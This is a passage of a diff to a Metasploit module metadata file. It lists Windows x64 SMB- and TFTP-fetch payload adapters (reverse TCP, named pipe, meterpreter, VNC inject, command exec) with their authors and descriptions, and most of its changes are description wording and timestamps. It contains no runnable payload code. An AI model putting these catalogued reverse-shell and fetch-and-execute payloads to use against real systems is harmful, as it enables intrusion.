|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_winhttp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_winhttp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_winhttp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_winhttps": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttps",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttps",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_winhttps",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_winhttps"
|
||||
},
|
||||
"payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp": {
|
||||
"name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp",
|
||||
@@ -220351,7 +224012,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220361,7 +224022,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp",
|
||||
@@ -220394,7 +224055,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220404,7 +224065,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid",
|
||||
@@ -220436,7 +224097,7 @@
|
||||
"bwatters-r7",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220446,7 +224107,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_named_pipe",
|
||||
@@ -220478,7 +224139,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220488,7 +224149,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_tcp",
|
||||
@@ -220525,7 +224186,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220535,7 +224196,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_rc4",
|
||||
@@ -220568,7 +224229,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220578,7 +224239,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_uuid",
|
||||
@@ -220610,7 +224271,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220620,7 +224281,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_http",
|
||||
@@ -220654,7 +224315,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220664,7 +224325,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_https",
|
||||
@@ -220696,7 +224357,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220706,7 +224367,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_named_pipe",
|
||||
@@ -220738,7 +224399,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220748,7 +224409,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp",
|
||||
@@ -220785,7 +224446,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220795,7 +224456,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_rc4",
|
||||
@@ -220828,7 +224489,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220838,7 +224499,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_uuid",
|
||||
@@ -220870,7 +224531,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220880,7 +224541,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttp",
|
||||
@@ -220912,7 +224573,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220922,7 +224583,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttps",
|
||||
@@ -220954,7 +224615,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220964,7 +224625,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/encrypted_shell/reverse_tcp",
|
||||
@@ -220996,7 +224657,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -221006,7 +224667,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/encrypted_shell_reverse_tcp",
|
||||
@@ -221035,7 +224696,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nExecute an arbitrary command (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -221045,7 +224706,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/exec",
|
||||
@@ -221075,7 +224736,7 @@
|
||||
"scriptjunkie",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nLoad an arbitrary x64 library path",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nLoad an arbitrary x64 library path",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -221085,7 +224746,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/loadlibrary",
|
||||
@@ -221114,7 +224775,7 @@
|
||||
"Brendan Watters",
|
||||
"pasta <jaguinaga@infobytesec.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -221124,7 +224785,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/messagebox",
|
||||
@@ -221155,7 +224816,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221166,7 +224827,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp",
|
||||
@@ -221199,7 +224860,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221210,7 +224871,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
@@ -221244,7 +224905,7 @@
|
||||
"OJ Reeves",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221255,7 +224916,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_named_pipe",
|
||||
@@ -221288,7 +224949,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221299,7 +224960,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp",
|
||||
@@ -221336,7 +224997,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221347,7 +225008,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4",
|
||||
@@ -221380,7 +225041,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
